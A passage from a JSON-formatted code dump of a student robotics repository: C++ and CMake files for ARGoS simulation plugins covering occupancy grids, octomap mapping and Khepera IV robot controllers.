COccupancyMedium::SetOccupancy(const CVector2& c_position) {\n CVector2 cell_position = PositionToCellPosition(c_position);\n m_cPheromoneCells[cell_position] = 1;\n LOG << \"occupancy set at cell position: \" + std::to_string(cell_position.GetX())\n + \", \" + std::to_string(cell_position.GetY()) + \"\\n\"; \n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::SetLocalLevels(COccupancyMedium::PheromoneMap& c_local_levels,\n const CVector2& c_cell_key,\n const CVector2& c_position)const{\n\n COccupancyMedium::PheromoneMap::const_iterator fKeyPair;\n\n // check to see if the cell has any pheromone\n fKeyPair = m_cPheromoneCells.find(c_cell_key);\n if(fKeyPair != m_cPheromoneCells.end()){\n // set the transorm the cordinates to meters and \n // translate it to be releative to the robot position\n CVector2 CLocalPosition = c_cell_key*m_fCellSize - c_position;\n // Set the entry in the local map\n c_local_levels[CLocalPosition] = fKeyPair->second;\n }\n}\n\n/****************************************/\n/****************************************/\n\n\nCOccupancyMedium::PheromoneMap COccupancyMedium::ReadPheromone(const CVector2& c_position, \n const Real& f_range, \n const bool& b_circle)const{\n COccupancyMedium::PheromoneMap cLocalLevels;\n \n // convert from meters to cell values\n //\n const CVector2 cAdjPosition(PositionToCellPosition(c_position));\n const UInt16 fAdjRange(ToCellDistance(f_range));\n \n // get \n const CVector2 cPosOffset(cAdjPosition-PositionToCellPosition(c_position));\n const Real fRangeOffset(fabs(fAdjRange-ToCellDistance(f_range)));\n\n CVector2 cCellKey;\n\n SInt16 nX=0, nXMin=0, nXMax=0, nY=0, nYMin=0, nYMax=0, nZ=0, nZMin=0, nZMax=0;\n\n return cLocalLevels;\n}\n/****************************************/\n/****************************************/\n\nREGISTER_MEDIUM(COccupancyMedium,\n \"occupancy_medium\",\n \"Turner Robbins [[email protected]]\",\n \"0.0\",\n \"Medium that manages an occupancy grid.\",\n \"This medium develops the occupancy grid as determined by readings from occupancy_acuator\\n\\n\"\n \"REQUIRED XML CONFIGURATION\\n\\n\"\n \"<pheromone id=\\\"pheromone\\\" />\\n\\n\"\n \"OPTIONAL XML ATTRIBUTES\\n\\n\"\n \"cell_size - The size in meters of the pheromone cells, defaults to .1\\n\",\n \"Under development\"\n);" }, { "alpha_fraction": 0.7869986295700073, "alphanum_fraction": 0.795297384262085, "avg_line_length": 33.42856979370117, "blob_id": "ca6e83f86df72b82e43e006060b3f89e41fbc6b3", "content_id": "858fad01e32307bacefd74358a3e7731afe5a21c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 723, "license_type": "no_license", "max_line_length": 93, "num_lines": 21, "path": "/ugv_diffusion_occupancy/plugins/robots/generic/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "\nset(HEADERS\n\tsimulator/occupancy_default_actuator.h)\n\nset(SOURCES\n\tcontrol_interface/ci_occupancy_actuator.cpp\n\tsimulator/occupancy_default_actuator.cpp)\n\ninclude_directories(~/swarm-mqp/)\n\nadd_library(argos3plugin_simulator_generic_occupancy SHARED ${HEADERS} ${SOURCES})\n\ntarget_link_libraries(argos3plugin_simulator_generic_occupancy\n argos3core_simulator\n occupancy_medium\n )\n\ninstall(TARGETS argos3plugin_simulator_generic_occupancy DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\n#FILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\n#install(FILES ${HEADERS_1} DESTINATION \"include/${relative_dir}/control_interface\")\n#install(FILES ${HEADERS_2} DESTINATION \"include/${relative_dir}/simulator\")" }, { "alpha_fraction": 0.7141608595848083, "alphanum_fraction": 0.7246503233909607, "avg_line_length": 39.875, "blob_id": "654596e26ce7dd3de82312c214b2b9519ec04f59", "content_id": "918ef5dd203eb8e7f339990bdce7ea6d1379c0ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2288, "license_type": "no_license", "max_line_length": 129, "num_lines": 56, "path": "/ugv_diffusion_occupancy/plugins/loop_functions/octomap_manager/octomap_manager.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include <argos3/core/utility/datatypes/any.h>\n\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_entity.h>\n\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_measures.h>\n\n#include \"plugins/controllers/kheperaiv_occupancy/kheperaiv_occupancy_controller.h\"\n\n#include \"octomap_manager.h\"\n\nvoid CLoopOctomapManager::Init (TConfigurationNode& t_tree) {\n\tm_KheperaMap = GetSpace().GetEntitiesByType(\"kheperaiv\");\n\tm_OcMap.setClampingThresMin(.1);\n\tm_OcMap.setClampingThresMax(.9);\n\tm_OcMap.setProbHit(.7);\n\tm_OcMap.setProbMiss(.3);\n\t//m_OcMap.setOccupancyThres(0.5);\n\n}\n\nvoid CLoopOctomapManager::insertRay() {\n\tstd::cout << \"\\n----insert ray called!----\" << std::endl;\n}\n\nvoid CLoopOctomapManager::PostStep() {\n\tstd::vector<octomap::point3d> robots;\n\tfor(CSpace::TMapPerType::iterator it = m_KheperaMap.begin(); it != m_KheperaMap.end(); ++it) {\n\t\t/* Get the kheperaController */\n\t\tCKheperaIVEntity& kheperaEntity = *any_cast<CKheperaIVEntity*>(it->second);\n\t\tCKheperaOccupancy& kheperaController = dynamic_cast<CKheperaOccupancy&>(kheperaEntity.GetControllableEntity().GetController());\n\t\toctomap::Pointcloud localScan = kheperaController.getLocalScan();\n\t\t/* 3D representation of sensor origin */\n \t\toctomap::point3d startp = octomap::point3d(kheperaEntity.GetEmbodiedEntity().GetOriginAnchor().Position.GetX(),\n \t\t\t\t\t\t\t\t\t\t\t\t\tkheperaEntity.GetEmbodiedEntity().GetOriginAnchor().Position.GetY(), \n \t\t\t\t\t\t\t\t\t\t\t\t\tkheperaEntity.GetEmbodiedEntity().GetOriginAnchor().Position.GetZ());\n \t\trobots.push_back(startp);\n \t\t/* Update local map by inserting the point cloud*/\n \t\tm_OcMap.insertPointCloud(localScan, startp);\n \t\tkheperaController.clearLocalScan();\n\t}\n\t/* go through robot locations and clear them on the map */\n\tfor(octomap::point3d pos : robots) {\n\t\tfor(Real i = 0.0; i < KHEPERAIV_BASE_RADIUS * 1.1; i += OCTCELLSIZE) {\n\t\t\tfor(Real j = 0.0; j < KHEPERAIV_BASE_RADIUS * 1.1; j += OCTCELLSIZE) {\n\t\t\t\tpoint3d pos (i, j, KHEPERAIV_ULTRASOUND_SENSORS_RING_ELEVATION);\n\t\t\t\tpoint3d neg (-i, -j, KHEPERAIV_ULTRASOUND_SENSORS_RING_ELEVATION);\n \t\tm_OcMap.updateNode(pos, false); // integrate 'free' measurement\n \t\tm_OcMap.updateNode(neg, false);\n\t\t\t}\n\t\t}\n\t}\n}\n\n//CLoopOctomapManager::\n\nREGISTER_LOOP_FUNCTIONS(CLoopOctomapManager, \"octomap_manager\")" }, { "alpha_fraction": 0.5429917573928833, "alphanum_fraction": 0.5541813969612122, "avg_line_length": 35.1489372253418, "blob_id": "824df5443a3914d5ebbd46080a46da706d62ad16", "content_id": "db47346db6010c5e15fe251f3ca2692d9fc81e15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1698, "license_type": "no_license", "max_line_length": 101, "num_lines": 47, "path": "/ugv_diffusion_occupancy/plugins/loop_functions/occupancy_visualizer/occupancy_visualizer.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include \"occupancy_visualizer.h\"\n\n/****************************************/\n/****************************************/\n\nCOccupancyQTUserFunctions::COccupancyQTUserFunctions() :\n m_cPheraMed(CSimulator::GetInstance().GetMedium<COccupancyMedium>(\"occupancy_medium\"))\n {\n // get the grid size and calculate the square corners\n m_fGridSize = m_cPheraMed.GetCellSize();\n m_cSquarePoints.resize(4);\n m_cSquarePoints[1].Set(m_fGridSize,0);\n m_cSquarePoints[2].Set(m_fGridSize,m_fGridSize);\n m_cSquarePoints[3].Set(0,m_fGridSize);\n\n // set the orienation for the squares\n m_cOrientation.FromAngleAxis(CRadians::ZERO, CVector3::Z);\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyQTUserFunctions::Init(TConfigurationNode& t_tree){\n m_bDrawDiffusion = false;\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyQTUserFunctions::DrawInWorld() {\n const COccupancyMedium::PheromoneMap& cPheromoneCells = m_cPheraMed.GetPheromoneMap();\n // offset is so the square is not in the same space as the floor \n CVector3 cOffset(0,0,0.1);\n /* Go through all the cells and draw them */\n for(const auto &pair: cPheromoneCells){\n CVector3 grid_3d = CVector3(pair.first.GetX()*m_fGridSize, pair.first.GetY()*m_fGridSize, 1);\n DrawPolygon(grid_3d,\n m_cOrientation, \n m_cSquarePoints,\n CColor(pair.second,0,0));\n }\n}\n\n/****************************************/\n/****************************************/\n\nREGISTER_QTOPENGL_USER_FUNCTIONS(COccupancyQTUserFunctions, \"occupancy_qtuser_functions\")" }, { "alpha_fraction": 0.8062953948974609, "alphanum_fraction": 0.8123486638069153, "avg_line_length": 38.380950927734375, "blob_id": "ad1164236f7e029d8476811a31f1d68bfdb03daf", "content_id": "5cd8db3b24c8df02a07927a80ef0e5718084a6b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 826, "license_type": "no_license", "max_line_length": 118, "num_lines": 21, "path": "/ugv_diffusion_occupancy/plugins/controllers/kheperaiv_occupancy/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "include_directories(${PROJECT_SOURCE_DIR}/plugins/loop_functions/octomap_manager/)\nset(HEADERS ${PROJECT_SOURCE_DIR}/plugins/loop_functions/octomap_manager/octomap_manager.h)\n\nadd_library(kheperaiv_occupancy SHARED kheperaiv_occupancy_controller.h kheperaiv_occupancy_controller.cpp ${HEADERS})\n\n\ntarget_link_libraries(kheperaiv_occupancy\n argos3core_simulator\n argos3plugin_simulator_epuck\n argos3plugin_simulator_genericrobot\n argos3plugin_simulator_kheperaiv.so\n argos3plugin_simulator_generic_occupancy\n liboctomap.so\n liboctomath.so\n liboctovis.so\n )\n\ninstall(TARGETS kheperaiv_occupancy DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES kheperaiv_occupancy_controller.h DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.8071253299713135, "alphanum_fraction": 0.812039315700531, "avg_line_length": 39.75, "blob_id": "27d2b3644624612e4c21176616bbd2209c564f33", "content_id": "a7ffe461b9ec709c7b9cfc51f769a6f6e959fa3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 814, "license_type": "no_license", "max_line_length": 105, "num_lines": 20, "path": "/ugv_exploration/plugins/controllers/kheperaiv_exploration/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "include_directories(${PROJECT_SOURCE_DIR}/plugins/loop_functions/octomap_manager/)\nset(HEADERS ${PROJECT_SOURCE_DIR}/plugins/loop_functions/octomap_manager/octomap_manager.h)\nset(SOURCES kheperaiv_exploration_controller.h kheperaiv_exploration_controller.cpp)\n\nadd_library(kheperaiv_exploration SHARED ${SOURCES} ${HEADERS})\n\n\ntarget_link_libraries(kheperaiv_exploration\n argos3core_simulator\n argos3plugin_simulator_epuck\n argos3plugin_simulator_genericrobot\n argos3plugin_simulator_kheperaiv.so\n liboctomap.so\n liboctomath.so\n liboctovis.so)\n\ninstall(TARGETS kheperaiv_exploration DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES kheperaiv_occupancy_controller.h DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.8630136847496033, "alphanum_fraction": 0.8630136847496033, "avg_line_length": 36, "blob_id": "d3f43615c908095a6991b60775ec438e01eb0df1", "content_id": "0a8c93ecce7cc2c1871d4fd6e8ed007c65ed2a6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 73, "license_type": "no_license", "max_line_length": 39, "num_lines": 2, "path": "/ugv_exploration/plugins/loop_functions/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#add_subdirectory(occupancy_visualizer)\nadd_subdirectory(octomap_manager)" }, { "alpha_fraction": 0.6611295938491821, "alphanum_fraction": 0.6777408719062805, "avg_line_length": 22.153846740722656, "blob_id": "c07765ed8287514d762929f4c4501e12f0e265c6", "content_id": "110ea215e033bab7157f7592c7048dbcab2f83b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 301, "license_type": "no_license", "max_line_length": 50, "num_lines": 13, "path": "/elevation_map/src/main.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cassert>\n#include <cstdlib>\n#include \"elevation_map.h\"\n\nint main (int argc, char **argv) {\n\tstd::cout << \"Making new elevation map\\n\";\n\tElevationMap *testMap = new ElevationMap(10, 15);\n\tassert(testMap != 0);\n\tstd::cout << \"Passed all assertions\\n\";\n\n\t//Given size of \n}\n" }, { "alpha_fraction": 0.8860759735107422, "alphanum_fraction": 0.8860759735107422, "avg_line_length": 39, "blob_id": "6fa51a0d07d6b4b69c553c340f1205938515ac8a", "content_id": "5aecf2b82fcef2d6f8595c51cef4d9798d229596", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 79, "license_type": "no_license", "max_line_length": 41, "num_lines": 2, "path": "/ugv_diffusion_occupancy/plugins/controllers/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "add_subdirectory(epuck_obstacleavoidance)\nadd_subdirectory(kheperaiv_occupancy)" }, { "alpha_fraction": 0.5992646813392639, "alphanum_fraction": 0.6029411554336548, "avg_line_length": 14.571428298950195, "blob_id": "d1a384d776a7047c8f1166ada997306000484be7", "content_id": "8458c0a97c39f69b4ad941dd17c55875b82d20d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 544, "license_type": "no_license", "max_line_length": 58, "num_lines": 35, "path": "/elevation_map/src/elevation_map.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef ELEVATION_MAP_H\n#define ELEVATION_MAP_H\n\n// Author: Turner Robbins\n// Description: Simple implementation of an elevation map.\nclass ElevationMap {\npublic:\n\tElevationMap() : m_map(0) {\n\n\t}\n\tElevationMap(int x_size, int y_size) : \n\tm_x(x_size), m_y(y_size) {\n\t\tm_map = new double*[x_size];\n\t\tfor(int i=0; i < m_x; i++) {\n\t\t\tm_map[i] = new double[y_size];\n\t\t}\n\t}\n\n\tvoid setCell(int x, int y, double val) {\n\t\tm_map[x][y] = val;\n\t}\n\n\tdouble getCell(int x, int y) {\n\t\treturn m_map[x][y];\n\t}\n\nprivate:\n\n\tdouble **m_map;\n\tint m_x;\n\tint m_y;\n};\n\n\n#endif" }, { "alpha_fraction": 0.762424886226654, "alphanum_fraction": 0.7717094421386719, "avg_line_length": 28.063491821289062, "blob_id": "79bc7f9d62ac8a47c6f98cc718273445021d4511", "content_id": "0fc7f514724a5bdd71b479cab032cdb8710e536d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 1831, "license_type": "no_license", "max_line_length": 88, "num_lines": 63, "path": "/ugv_exploration/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "cmake_minimum_required (VERSION 2.6)\n\nproject (kheperaiv_exploration)\n\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${CMAKE_SOURCE_DIR}/cmake)\n\n# Deactivate RPATH for MacOSX\nset(CMAKE_MACOSX_RPATH 0)\n\nset(Lua52_DIR)\nfind_package(Lua52)\nif(LUA52_FOUND)\n set(ARGOS_WITH_LUA ON)\n include_directories(${LUA_INCLUDE_DIR})\nendif(LUA52_FOUND)\n\n#\n# Check for ARGoS3\n#\n# Find the ARGoS package, make sure to save the ARGoS prefix\nfind_package(PkgConfig)\npkg_check_modules(ARGOS REQUIRED argos3_simulator)\nset(ARGOS_PREFIX ${ARGOS_PREFIX} CACHE INTERNAL \"\")\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${ARGOS_PREFIX}/share/argos3/cmake)\n# Set ARGoS include dir\ninclude_directories(${ARGOS_INCLUDE_DIRS})\n# Set ARGoS link dir\nlink_directories(${ARGOS_LIBRARY_DIRS})\n\n# Check whether all the necessary libs have been installed to compile the\n# code that depends on Qt and OpenGL\ninclude(ARGoSCheckQTOpenGL)\n\n#\n# Add repository directory to the list of includes\n# This makes it possible to say #include <argos3/...> with\n# repository includes.\n#\ninclude_directories(${CMAKE_SOURCE_DIR})\n\n# use, i.e. don't skip the full RPATH for the build tree\nset(CMAKE_SKIP_BUILD_RPATH FALSE)\n\n# when building, don't use the install RPATH already\n# (but later on when installing)\nset(CMAKE_BUILD_WITH_INSTALL_RPATH FALSE)\nset(CMAKE_INSTALL_RPATH \"${CMAKE_INSTALL_PREFIX}/lib/vicon_sdk:${CMAKE_BINARY_DIR}/lib\")\n\n# add the automatically determined parts of the RPATH\n# which point to directories outside the build tree to the install RPATH\nset(CMAKE_INSTALL_RPATH_USE_LINK_PATH TRUE)\n\n\nset(CMAKE_CXX_STANDARD 11)\nset(CMAKE_CXX_STANDARD_REQUIRED ON)\n\ninclude_directories(plugins/robots/generic/control_interface/)\ninclude_directories(plugins/loop_functions/)\ninclude_directories(plugins/controllers/)\n\nadd_subdirectory(plugins)\n\nset(CMAKE_CXX_EXTENSIONS OFF)\n" }, { "alpha_fraction": 0.6404637098312378, "alphanum_fraction": 0.6468159556388855, "avg_line_length": 38.86075973510742, "blob_id": "609abab0be981286d758d1ce726637679612d5bb", "content_id": "78cea44c30b57eb96b2ab3355cb26718a661e134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6297, "license_type": "no_license", "max_line_length": 126, "num_lines": 158, "path": "/ugv_diffusion_occupancy/plugins/controllers/kheperaiv_occupancy/kheperaiv_occupancy_controller.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "/* Include the controller definition */\n#include \"kheperaiv_occupancy_controller.h\"\n#include <octomap_manager.h>\n/* Function definitions for XML parsing */\n#include <argos3/core/utility/configuration/argos_configuration.h>\n/* 2D vector definition */\n#include <argos3/core/utility/math/vector2.h>\n/* Definition of ultrasound implementation */\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_ultrasound_default_sensor.h>\n/* Definition of ultrasound interface */\n#include <argos3/plugins/robots/kheperaiv/control_interface/ci_kheperaiv_ultrasound_sensor.h>\n/**/\n#include <argos3/core/utility/logging/argos_log.h>\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_measures.h>\n#include <math.h>\n#include <argos3/core/control_interface/ci_sensor.h>\n\n#include <argos3/core/control_interface/ci_sensor.h>\n#include <argos3/core/utility/math/angles.h>\n\n\n\ntypedef CCI_KheperaIVUltrasoundSensor::TReadings TReadings;\ntypedef struct CCI_KheperaIVUltrasoundSensor::SReading SReading;\n/****************************************/\n/****************************************/\n\nCKheperaOccupancy::CKheperaOccupancy() :\n m_pcWheels(NULL),\n m_pcUltrasoundSensor(NULL),\n pcOccupancy(NULL),\n m_cAlpha(10.0f),\n m_fDelta(0.5f),\n m_fWheelVelocity(2.5f),\n m_cGoStraightAngleRange(-ToRadians(m_cAlpha),\n ToRadians(m_cAlpha)),\n m_localMap(octomap::OcTree(OCTCELLSIZE)),\n m_localScan(octomap::Pointcloud()){}\n\n/****************************************/\n/****************************************/\n\nvoid CKheperaOccupancy::Init(TConfigurationNode& t_node) {\n /*\n * Get sensor/actuator handles\n *\n * The passed string (ex. \"differential_steering\") corresponds to the\n * XML tag of the device whose handle we want to have. For a list of\n * allowed values, type at the command prompt:\n *\n * $ argos3 -q actuators\n *\n * to have a list of all the possible actuators, or\n *\n * $ argos3 -q sensors\n *\n * to have a list of all the possible sensors.\n *\n * NOTE: ARGoS creates and initializes actuators and sensors\n * internally, on the basis of the lists provided the configuration\n * file at the <controllers><kheperaiv_diffusion><actuators> and\n * <controllers><kheperaiv_diffusion><sensors> sections. If you forgot to\n * list a device in the XML and then you request it here, an error\n * occurs.\n */\n m_pcWheels = GetActuator<CCI_DifferentialSteeringActuator >(\"differential_steering\");\n m_pcUltrasoundSensor = GetSensor <CCI_KheperaIVUltrasoundSensor >(\"kheperaiv_ultrasound\" );\n pcOccupancy = GetActuator<CCI_OccupancyActuator >(\"occupancy\");\n m_pcProximity = GetSensor <CCI_KheperaIVProximitySensor >(\"kheperaiv_proximity\" );\n m_pcPosition = GetSensor <CCI_PositioningSensor >(\"positioning\");\n\n /*\n * Parse the configuration file\n *\n * The user defines this part. Here, the algorithm accepts three\n * parameters and it's nice to put them in the config file so we don't\n * have to recompile if we want to try other settings.\n */\n GetNodeAttributeOrDefault(t_node, \"alpha\", m_cAlpha, m_cAlpha);\n m_cGoStraightAngleRange.Set(-ToRadians(m_cAlpha), ToRadians(m_cAlpha));\n GetNodeAttributeOrDefault(t_node, \"delta\", m_fDelta, m_fDelta);\n GetNodeAttributeOrDefault(t_node, \"velocity\", m_fWheelVelocity, m_fWheelVelocity);\n}\n\n/****************************************/\n/****************************************/\n\nvoid CKheperaOccupancy::ControlStep() {\n /**************************************/\n /***********DIFFUSION******************/\n /**************************************/\n /* Get readings from proximity sensor */\n const CCI_KheperaIVProximitySensor::TReadings& tProxReads = m_pcProximity->GetReadings();\n /* Sum them together */\n CVector2 cAccumulator;\n for(size_t i = 0; i < tProxReads.size(); ++i) {\n cAccumulator += CVector2(tProxReads[i].Value, tProxReads[i].Angle);\n }\n cAccumulator /= tProxReads.size();\n /* If the angle of the vector is small enough and the closest obstacle\n * is far enough, continue going straight, otherwise curve a little\n */\n CRadians cAngle = cAccumulator.Angle();\n if(m_cGoStraightAngleRange.WithinMinBoundIncludedMaxBoundIncluded(cAngle) &&\n (cAccumulator.Length() * 2.0) < m_fDelta ) {\n /* Go straight */\n m_pcWheels->SetLinearVelocity(m_fWheelVelocity, m_fWheelVelocity);\n }\n else {\n /* Turn, depending on the sign of the angle */\n if(cAngle.GetValue() > 0.0f) {\n m_pcWheels->SetLinearVelocity(m_fWheelVelocity, 0.0f);\n }\n else {\n m_pcWheels->SetLinearVelocity(0.0f, m_fWheelVelocity);\n }\n }\n\n /**************************************/\n /***********PointCloud*****************/\n /**************************************/\n /* Get robot position and orientation */\n CQuaternion r_angle = m_pcPosition->GetReading().Orientation;\n CRadians rob_z_rot, y, x;\n m_pcPosition->GetReading().Orientation.ToEulerAngles(rob_z_rot, y, x);\n /* Get readings from lidar */\n const TReadings& readings = m_pcUltrasoundSensor->GetReadings();\n /* Ray start at (0,0,0) */\n CVector3 rayStart, rayEnd;\n rayStart = m_pcPosition->GetReading().Position;\n /* Calculate ray end */\n /* The reading is in cm, rescaled to meters */\n rayEnd.Set(KHEPERAIV_ULTRASOUND_SENSORS_RING_RADIUS +\n readings[0].Value * (KHEPERAIV_ULTRASOUND_SENSORS_RING_RANGE.GetMax() - KHEPERAIV_ULTRASOUND_SENSORS_RING_RANGE.GetMin()),\n 0.0, 0.0);\n /* Rotate it around Z */\n rayEnd.RotateZ(rob_z_rot);\n /* Translation */\n rayEnd += rayStart;\n\n /* insert end point into point cloud */\n m_localScan.push_back(rayEnd.GetX(), rayEnd.GetY(), rayEnd.GetZ());\n}\n\n/****************************************/\n/****************************************/\n\n/*\n * This statement notifies ARGoS of the existence of the controller.\n * It binds the class passed as first argument to the string passed as\n * second argument.\n * The string is then usable in the configuration file to refer to this\n * controller.\n * When ARGoS reads that string in the configuration file, it knows which\n * controller class to instantiate.\n * See also the configuration files for an example of how this is used.\n */\nREGISTER_CONTROLLER(CKheperaOccupancy, \"kheperaiv_occupancy_controller\")" }, { "alpha_fraction": 0.7271317839622498, "alphanum_fraction": 0.7291989922523499, "avg_line_length": 29.480314254760742, "blob_id": "a7c888835a84b4e159c029afbf46552ff8a07f2a", "content_id": "9d8c287eac937e1f6bda3145ec26720b9f8ce7c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3870, "license_type": "no_license", "max_line_length": 94, "num_lines": 127, "path": "/ugv_exploration/plugins/controllers/kheperaiv_exploration/kheperaiv_exploration_controller.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef KHEPERAIV_EXPLORATION_CONTROLLER_H\n#define KHEPERAIV_EXPLORATION_CONTROLLER_H\n//INCLUDE\n\n#include <argos3/core/control_interface/ci_controller.h>\n/* Definition of the differential steering actuator */\n#include <argos3/plugins/robots/generic/control_interface/ci_differential_steering_actuator.h>\n\n/* Definition of ultrasound implementation */\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_ultrasound_default_sensor.h>\n\n/* Definition of ultrasound interface */\n#include <argos3/plugins/robots/kheperaiv/control_interface/ci_kheperaiv_ultrasound_sensor.h>\n\n/* Definition of the control interface for the position sensor and sreading */\n#include <argos3/plugins/robots/generic/control_interface/ci_positioning_sensor.h>\n\n#include <argos3/plugins/robots/kheperaiv/control_interface/ci_kheperaiv_proximity_sensor.h>\n\n/*octomap includes for OcTree & various octomap functions*/\n#include <octomap/octomap.h>\n#include <octomap/OcTree.h>\n#include <octomap/Pointcloud.h>\n\n//DEFINITIONS\nusing namespace argos;\nenum class UGV_State {\n SCAN,\n WALK,\n UPDATE\n};\n\nclass CKheperaExploration : public CCI_Controller {\n//Define public members\npublic:\n /*Class constructor*/\n CKheperaExploration();\n\n /*Class destructor*/\n virtual ~CKheperaExploration(){}\n\n /*\n * This function initializes the controller.\n * The 't_node' variable points to the <parameters> section in the XML\n * file in the <controllers><footbot_diffusion_controller> section.\n */\n virtual void Init(TConfigurationNode& t_node);\n\n /*\n * This function is called once every time step.\n * The length of the time step is set in the XML file.\n */\n virtual void ControlStep();\n\n /*\n * This function resets the controller to its state right after the\n * Init().\n * It is called when you press the reset button in the GUI.\n * In this example controller there is no need for resetting anything,\n * so the function could have been omitted. It's here just for\n * completeness.\n */\n virtual void Reset() {}\n\n /*\n * Called to cleanup what done by Init() when the experiment finishes.\n * In this example controller there is no need for clean anything up,\n * so the function could have been omitted. It's here just for\n * completeness.\n */\n virtual void Destroy() {\n }\n\n virtual octomap::Pointcloud &getLocalScan() { \n return m_localScan;\n }\n\n virtual void clearLocalScan() {\n m_localScan.clear();\n }\n\n\n//Define private members\nprivate:\n\t/* pointer to the lidar sensor\t*/\n\tCCI_KheperaIVUltrasoundSensor* m_pcUltrasoundSensor;\n\t/* pointer to the differential steering actuator */\n\tCCI_DifferentialSteeringActuator* m_pcWheels;\n /* pointer to the proximity sensor */\n CCI_KheperaIVProximitySensor* m_pcProximity;\n /* pointer to the position sensor */\n CCI_PositioningSensor* m_pcPosition;\n /*\n * The following variables are used as parameters for the\n * algorithm. You can set their value in the <parameters> section\n * of the XML configuration file, under the\n * <controllers><footbot_diffusion_controller> section.\n */\n\n /* Maximum tolerance for the angle between\n * the robot heading direction and\n * the closest obstacle detected. */\n CDegrees m_cAlpha;\n /* Maximum tolerance for the proximity reading between\n * the robot and the closest obstacle.\n * The proximity reading is 0 when nothing is detected\n * and grows exponentially to 1 when the obstacle is\n * touching the robot.\n */\n Real m_fDelta;\n /* Wheel speed. */\n Real m_fWheelVelocity;\n /* Angle tolerance range to go straight.\n * It is set to [-alpha,alpha]. */\n CRange<CRadians> m_cGoStraightAngleRange;\n /* octomap */\n octomap::OcTree m_localMap;\n /* current position */\n CCI_PositioningSensor::SReading m_position;\n\n std::vector<CRadians> m_cAngleOffsets;\n\n octomap::Pointcloud m_localScan;\n\n UGV_State m_state;\n};\n#endif" }, { "alpha_fraction": 0.7870722413063049, "alphanum_fraction": 0.7870722413063049, "avg_line_length": 28.22222137451172, "blob_id": "fc748d0933fa1e046a60f6f9788a82a0edcb3e4a", "content_id": "9daf4a2bd903423d1f5e6de372aacbcaad6a90b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 263, "license_type": "no_license", "max_line_length": 85, "num_lines": 9, "path": "/ugv_diffusion_occupancy/plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/cmake_clean.cmake", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"occupancy_medium_automoc.cpp\"\n \"CMakeFiles/occupancy_medium_automoc\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/occupancy_medium_automoc.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" } ]
39
Yancey2126/Numerical-Analysis-
https://github.com/Yancey2126/Numerical-Analysis-
036c5dc8ca50dc11c17b28de8a621594b39254af
77902a04f27720200f15da038657a5528417ce12
5d4a9f1e53e674b2f425228da92bd156bcae2362
refs/heads/master
2021-08-08T16:23:37.823751
2017-11-10T17:40:03
2017-11-10T17:40:03
110,273,888
0
0
null
null
null
null
null
